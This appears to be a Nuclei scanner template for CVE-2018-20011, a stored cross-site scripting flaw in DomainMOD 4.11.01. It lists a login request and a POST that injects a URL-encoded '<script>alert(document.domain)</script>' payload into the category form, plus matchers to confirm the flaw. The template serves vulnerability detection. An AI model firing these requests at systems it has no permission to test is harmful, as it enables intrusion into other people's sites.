id: CVE-2018-20011 info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20011 cwe-id: CWE-79 metadata: verified: true tags: domainmod,xss,authenticated,edb,cve,cve1028 requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | POST /assets/add/category.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - | GET /assets/categories.php HTTP/1.1 Host: {{Hostname}} cookie-reuse: true host-redirects: true max-redirects: 2 req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(all_headers_3, "text/html")' - 'contains(body_3, ">")' condition: and # Enhanced by mp on 2022/08/10